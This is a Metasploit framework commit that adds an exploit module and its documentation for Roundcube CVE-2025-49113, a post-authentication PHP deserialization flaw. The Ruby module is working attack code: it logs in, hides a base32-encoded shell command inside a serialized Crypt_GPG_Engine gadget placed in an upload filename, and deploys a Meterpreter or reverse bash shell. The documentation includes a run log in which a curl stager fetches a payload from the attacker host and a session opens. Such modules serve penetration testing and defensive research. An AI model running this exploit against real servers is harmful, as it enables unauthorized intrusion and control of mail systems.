Land rapid7#20291, adds Roundcube post-authentication RCE (CVE-2025-49113)

msutovsky-r7 · web-flow · commit f2920f868aa4 · 2025-06-11T10:48:58.000+02:00
Add Remote for Roundсube CVE-2025-49113 post-authentication RCE module
diff --git a/documentation/modules/exploit/multi/http/roundcube_auth_rce_cve_2025_49113.md b/documentation/modules/exploit/multi/http/roundcube_auth_rce_cve_2025_49113.md
@@ -0,0 +1,147 @@
+## Vulnerable Application
+  This module exploits an authenticated remote code execution vulnerability via a file upload
+  endpoint. The vulnerability stems from improper validation of the uploaded filename, which is
+  deserialized on the server side without sufficient sanitization. By embedding a PHP serialization
+  gadget chain in the filename, an attacker can achieve remote code execution.
+
+  This issue is tracked as CVE-2025-49113. Exploitation results in code execution as the web server
+  user.
+
+## Testing
+To set up a test environment:
+1. Set up an Roundcube.
+
+Create File
+`docker-compose.xml`
+```
+version: '3'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: example_root_pass
+      MYSQL_DATABASE: roundcube
+      MYSQL_USER: roundcube_user
+      MYSQL_PASSWORD: roundcube_pass
+    volumes:
+      - db_data:/var/lib/mysql
+
+  roundcube:
+    image: roundcube/roundcubemail:1.5.9-apache
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+    environment:
+      ROUNDCUBEMAIL_DEFAULT_HOST: <ROUNDCUBEMAIL_DEFAULT_HOST>
+      ROUNDCUBEMAIL_SMTP_SERVER: <ROUNDCUBEMAIL_SMTP_SERVER>
+      ROUNDCUBEMAIL_SMTP_PORT: 587
+      ROUNDCUBEMAIL_SMTP_USER: <ROUNDCUBEMAIL_SMTP_USER>
+      ROUNDCUBEMAIL_SMTP_PASS: <ROUNDCUBEMAIL_SMTP_PASS>
+      ROUNDCUBEMAIL_DES_KEY: randomstring
+      ROUNDCUBEMAIL_DB_TYPE: mysql
+      ROUNDCUBEMAIL_DB_HOST: db
+      ROUNDCUBEMAIL_DB_USER: roundcube_user
+      ROUNDCUBEMAIL_DB_PASSWORD: roundcube_pass
+      ROUNDCUBEMAIL_DB_NAME: roundcube
+
+volumes:
+  db_data:
+```
+
+Execute
+
+`docker compose up`
+
+2. Configure basic networking and confirm that the web service on port 8080 is reachable.
+3. Follow the verification steps below.
+
+## Options
+No custom options exist for this module.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/roundcube_unauth_rce_cve_2025_49113`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set LHOST <LOCAL_IP>`
+6. `set LPORT <LOCAL_PORT>`
+7. `set USERNAME <USERNAME_TO_LOGIN_WITH>`
+8. `set PASSWORD <PASSWORD_TO_LOGIN_WITH>`
+9. `run`
+
+## Scenarios
+### Roundcube Linux Target
+```
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > show options
+
+Module options (exploit/multi/http/roundcube_unauth_rce_cve_2025_49113):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HOST                        no        The hostname of Roundcube server
+   PASSWORD                    yes       Password to login with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      9999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The URI of the Roundcube Application
+   TIMEOUT    3                no        Time to wait for session (in seconds)
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME                    yes       Email User to login with
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.129:8082 
+[*] Using URL: http://192.168.159.129:9696/
+[*] Fetching CSRF token...
+[*] Attempting login...
+[+] Login successful.
+[*] Preparing payload...
+[+] Payload successfully generated and serialized.
+[*] Uploading malicious payload...
+[*] Client 192.168.181.148 (curl/7.74.0) requested /
+[*] Sending payload to 192.168.181.148 (curl/7.74.0)
+[*] Sending stage (3045380 bytes) to 192.168.181.148
+[*] Meterpreter session 1 opened (192.168.159.129:8082 -> 192.168.181.148:56528) at 2025-06-06 21:05:59 -0400
+[+] Exploit attempt complete. Check for session.
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+
+meterpreter > sysinfo
+Computer     : dante.local
+OS           : Debian 11.5 (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
diff --git a/modules/exploits/multi/http/roundcube_auth_rce_cve_2025_49113.rb b/modules/exploits/multi/http/roundcube_auth_rce_cve_2025_49113.rb
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization',
+        'Description' => %q{
+          Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution
+          by authenticated users because the _from parameter in a URL is not validated
+          in program/actions/settings/upload.php, leading to PHP Object Deserialization.
+
+          An attacker can execute arbitrary system commands as the web server.
+        },
+        'Author' => [
+          'Maksim Rogov', # msf module
+          'Kirill Firsov', # disclosure and original exploit
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-49113'],
+          ['URL', 'https://fearsoff.org/research/roundcube']
+        ],
+        'DisclosureDate' => '2025-06-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Platform' => ['unix', 'linux'],
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ARCH_CMD],
+              'Type' => :nix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Email User to login with', '' ]),
+        OptString.new('PASSWORD', [true, 'Password to login with', '' ]),
+        OptString.new('TARGETURI', [true, 'The URI of the Roundcube Application', '/' ]),
+        OptString.new('HOST', [false, 'The hostname of Roundcube server', ''])
+      ]
+    )
+  end
+
+  class PhpPayloadBuilder
+    def initialize(command)
+      @encoded = Rex::Text.encode_base32(command)
+      @gpgconf = %(echo "#{@encoded}"|base32 -d|sh &#)
+    end
+
+    def build
+      len = @gpgconf.bytesize
+      %(|O:16:"Crypt_GPG_Engine":3:{s:8:"_process";b:0;s:8:"_gpgconf";s:#{len}:"#{@gpgconf}";s:8:"_homedir";s:0:"";};)
+    end
+  end
+
+  def fetch_login_page
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
+    res
+  end
+
+  def check
+    res = fetch_login_page
+
+    unless res.body =~ /"rcversion"\s*:\s*(\d+)/
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number")
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1).to_s)
+    print_good("Extracted version: #{version}")
+
+    if version.between?(Rex::Version.new(10100), Rex::Version.new(10509))
+      return CheckCode::Appears
+    elsif version.between?(Rex::Version.new(10600), Rex::Version.new(10610))
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def build_serialized_payload
+    print_status('Preparing payload...')
+
+    stager = case target['Type']
+             when :nix_cmd
+               payload.encoded
+             when :linux_dropper
+               generate_cmdstager.join(';')
+             else
+               fail_with(Failure::BadConfig, 'Unsupported target type')
+             end
+
+    serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"')
+    print_good('Payload successfully generated and serialized.')
+    serialized
+  end
+
+  def exploit
+    token = fetch_csrf_token
+    login(token)
+
+    payload_serialized = build_serialized_payload
+    upload_payload(payload_serialized)
+  end
+
+  def fetch_csrf_token
+    print_status('Fetching CSRF token...')
+
+    res = fetch_login_page
+    html = res.get_html_document
+
+    token_input = html.at('input[name="_token"]')
+    unless token_input
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
+    end
+
+    token = token_input.attributes.fetch('value', nil)
+    if token.blank?
+      fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty")
+    end
+
+    print_good("Extracted token: #{token}")
+    token
+  end
+
+  def login(token)
+    print_status('Attempting login...')
+    vars_post = {
+      '_token' => token,
+      '_task' => 'login',
+      '_action' => 'login',
+      '_url' => '_task=login',
+      '_user' => datastore['USERNAME'],
+      '_pass' => datastore['PASSWORD']
+    }
+
+    vars_post['_host'] = datastore['HOST'] if datastore['HOST']
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => vars_post,
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302
+
+    print_good('Login successful.')
+  end
+
+  def generate_from
+    options = [
+      'compose',
+      'reply',
+      'import',
+      'settings',
+      'folders',
+      'identity'
+    ]
+    options.sample
+  end
+
+  def generate_id
+    random_data = SecureRandom.random_bytes(8)
+    timestamp = Time.now.to_f.to_s
+    Digest::MD5.hexdigest(random_data + timestamp)
+  end
+
+  def generate_uploadid
+    millis = (Time.now.to_f * 1000).to_i
+    "upload#{millis}"
+  end
+
+  def upload_payload(payload_filename)
+    print_status('Uploading malicious payload...')
+
+    # 1x1 transparent pixel image
+    png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')
+    boundary = Rex::Text.rand_text_alphanumeric(8)
+
+    data = ''
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n"
+    data << "Content-Type: image/png\r\n\r\n"
+    data << png_data
+    data << "\r\n--#{boundary}--\r\n"
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "?_task=settings&_remote=1&_from=edit-!#{generate_from}&_id=#{generate_id}&_uploadid=#{generate_uploadid}&_action=upload"),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data
+    })
+
+    print_good('Exploit attempt complete. Check for session.')
+  end
+end
